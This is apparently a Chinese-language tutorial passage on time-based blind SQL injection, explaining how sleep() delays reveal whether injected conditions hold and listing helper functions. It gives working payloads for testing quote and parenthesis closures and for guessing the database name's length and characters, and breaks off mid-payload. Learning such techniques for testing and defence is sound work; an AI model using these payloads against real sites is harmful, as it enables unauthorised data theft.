简介
时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。
步骤
- 设置时间延迟,正确的延迟,错误则不会延迟来进行猜测,得到正确的闭合
- 继续利用设置时间延迟,正确的延迟,错误则不会延迟来进行猜测各种数据
函数
length() 返回字符串的长度
ascii() 返回一个字符的ascii码值
mid() 取出字符串中的一部分值
substr() 截取字符串
hex() 返回16进制数
sleep() 时间注入的核心函数
sleep(1) 过1s相应
if() if判断函数
if(1=1,3,4) 返回3
if(1=2,3,4) 返回4
构建判断语句
id=1' and if(1=2,1,sleep(10)) --+
id=1" and if(1=2,1,sleep(10)) --+
id=1) and if(1=2,1,sleep(10)) --+
构建暴库语句
id=1' and if(length(database())>1,sleep(2),0) --+
增加1值来猜库名的长度
id=1' and if(ascii(substr(database(),1,1))>114,sleep(2),0) --+
增加1值,对照ascii表查询库名
id=1’ and